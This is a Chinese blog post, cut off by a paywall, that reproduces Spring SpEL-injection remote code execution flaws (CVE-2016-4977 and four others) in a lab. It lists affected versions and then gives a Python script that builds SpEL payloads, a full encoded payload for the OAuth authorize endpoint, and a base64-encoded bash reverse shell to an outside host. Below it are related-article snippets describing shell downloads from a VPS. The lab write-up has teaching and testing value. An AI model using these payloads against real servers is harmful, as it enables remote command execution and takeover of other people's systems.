漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273

最新推荐文章于 2024-07-17 15:49:08 发布
最新推荐文章于 2024-07-17 15:49:08 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: spring 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556536/article/details/110374017
版权
本文详细介绍了Spring框架中五个重要的安全漏洞 CVE-2016-4977、CVE-2017-4971、CVE-2017-8046、CVE-2018-1270和CVE-2018-1273的原理和复现过程,涉及Spring Security OAuth、Spring WebFlow、Spring Data REST和Spring Messaging等模块,通过SpEL表达式注入,可能导致远程命令执行。
摘要由CSDN通过智能技术生成

Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273

基础知识

  Spring框架是由于软件开发的复杂性而创建的。Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅仅限于服务器端的开发。从简单性、可测试性和松耦合性角度而言,绝大部分Java应用都可以从Spring中受益。

漏洞原理

  CVE-2016-4977:Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。

  CVE-2017-4971:Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

  CVE-2017-8046:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中【实现RFC6902】(https://tools.ietf.org/html/rfc6902)),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

  CVE-2018-1270:spring messaging是基于sockjs(可以理解为一个通信协议),而sockjs适配多种浏览器:现代浏览器中使用websocket通信,老式浏览器中使用ajax通信。
连接后端服务器的流程,可以理解为: 用STOMP协议将数据组合成一个文本流,再用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信,使用http来复现漏洞,称之为“降维打击”。

  CVE-2018-1273:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

涉及版本

  CVE-2016-4977

  • Spring Security OAuth 2.3到2.3.2
  • Spring Security OAuth 2.2到2.2.1
  • Spring Security OAuth 2.1到2.1.1
  • Spring Security OAuth 2.0到2.0.14

  CVE-2017-4971

  • Spring WebFlow 2.4.0 - 2.4.4
  • 较旧的不受支持的版本也会受到影响

  CVE-2017-8046

  • Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
  • Spring Boot version < 2.0.0M4
  • Spring Data release trains < Kay-RC3

  CVE-2018-1270

  • Spring Framework 5.0 to 5.0.4.
  • Spring Framework 4.3 to 4.3.14
  • 已不支持的旧版本仍然受影响

  CVE-2018-1273

  • Spring Data Commons 1.13至1.13.10(Ingalls SR10)
  • Spring Data REST 2.6至2.6.10(Ingalls SR10)
  • Spring Data Commons 2.0至2.0.5(Kay SR5)
  • Spring Data REST 3.0至3.0.5(Kay SR5)
  • 较旧的不受支持的版本也会受到影响

漏洞复现

CVE-2016-4977

启动环境:

http://your-ip:8080/oauth/authorize?response_type=${
   233*233}&client_id=acme&scope=openid&redirect_uri=http://test

首先需要填写用户名和密码,我们这里填入admin:admin,发现返回结果为${}中的乘法被执行:
在这里插入图片描述

(1)创建文件

使用靶场自带的脚本:

// poc.py
#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'

执行脚本,命令如下:

// 命令
python poc.py 
Enter message to encode:touch /tmp/111

执行的记录如下:
在这里插入图片描述
poc如下:

// An highlighted block
/oauth/authorize?response_type=${
   T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(116).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(49)))}&client_id=acme&scope=openid&redirect_uri=http://test

得到poc拼接到上面的${}位置,即可执行,burp suite记录如下:

在这里插入图片描述
成功执行:
在这里插入图片描述
(1)反弹

编码反弹语句(不编码的试了没有反弹成功):

bash -i >& /dev/tcp/目标 IP/2222 0>&1
// 编码后
bash -c {
   echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC42Ny4xMjUvMjIyMiAwPiYx}|{
   base64,-d}|{
   bash,-i}

在线编码工具:

http://www.jackson-t.ca/runtime-exec-payloads.html

在这里插入图片描述
将编码后的反弹命令再编码一下,得到攻击的poc
在这里插入图片描述
执行命令:

// GET包访问路径
/oauth/authorize?response_type=${
   T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 570
Docker复现SpringBoot CVE-2016-4977
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1240
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
spring 代码执行 (CVE-2018-1273
最新发布
qq_23003811的博客
07-17 325
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。5、打开vps服务器临时web服务器,这样就可以通过91.208.73.100:7777/shell.sh访问到我们制作好的文件。6、使用burp发送数据包,在被攻击的服务器上下载我们的shell。7、使用burp发送数据包,在被攻击的服务器上执行下载好的shell。4、在自己的vps服务器创一个shell.sh文件,内容为反弹连接。
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1493
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
黑白的博客
12-20 1870
声明 好好学习,天天向上 漏洞描述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 影响范围 2.0.0-2.0.9 1.0.0-1.0.5 复现过程 这里使用2.0.8版本 使用vulhub cd /app/vulhub-master/spring/CVE-201
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 785
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
06-09
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5128
cve-2016-4977(spring-security-oauth) RCE漏洞复现
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5747
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录
weixin_42513429的博客
08-19 283
https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客,对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入 影响范围(复制来的): Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .
cve-2018-1273复现思路及简单利用(避坑)
weixin_45695535的博客
04-01 6976
复现过程环境准备攻击流程vulhub环境搭建构造poc利用-反弹shell-bash指令构造(失败)利用-反弹shell-从自己服务器下载.sh文件执行总结参考文档 环境准备 作者采用的是搭配是: 一台攻击机(kali-2021)192.168.141.190 受害机(vulhub搭建的)192.168.141.194 一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128 攻击流程 vulhub环境搭建 找到cve-2018-1273文件夹,通过"docker-co
Spring Data Commons 远程命令执行漏洞CVE-2018-1273复现
klcyl_0106的博客
05-25 446
1.通过"docker-compose build"和"docker-compose up -d"拉取环境 刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker 2.访问服务器ip:8080/users看环境是否成功 3.注册时抓包,并修改成如下数据包: POST /users?page=&size=5 HTTP/1.1 Host: localhost:8080 Connection:
spring漏洞复现CVE-2016-4977+CVE-2017-8046+CVE-2017-4971+CVE-2018-1270+CVE-2018-1273远程命令执行漏洞
serendipity1130的博客
09-01 611
1.CVE-2016-4977 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 1.访问网址: http://192.168.225.139:8080/oauth/authorize?response_type=${233*233}&client
CVE-2018-1273漏洞复现
qq_56426046的博客
09-11 1004
搭建好vulhub环境,选择 CVE-2018-1273漏洞通过"docker-compose build"和"docker-compose up -d"拉取环境,之后访问服务器ip:8080/users看环境是否成功。
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行任意代码。与CVE-2015-7501漏洞原理相似,但利用的路径不同,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。\[1\] 要利用CVE-2017-7504漏洞,可以按照以下步骤进行操作: 1. 访问靶场环境。 2. 使用CVE-2017-12149的工具和脚本在攻击机上执行命令,生成poc(详情请参考相关文章)\[2\]。 3. 在另一个终端上监听端口。 4. 在第一个终端上执行命令,生成成功\[3\]。 请注意,这只是一种利用CVE-2017-7504漏洞的方法,具体操作可能因环境和工具而异。 #### 引用[.reference_title] - *1* [JBossMQ JMS 反序列化漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_51151498/article/details/128283378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[Vulfocus解题系列] jboss 反序列化 (CVE-2017-7504)](https://blog.csdn.net/qq_45813980/article/details/118653639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JBoss反序列漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_46411728/article/details/126714312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值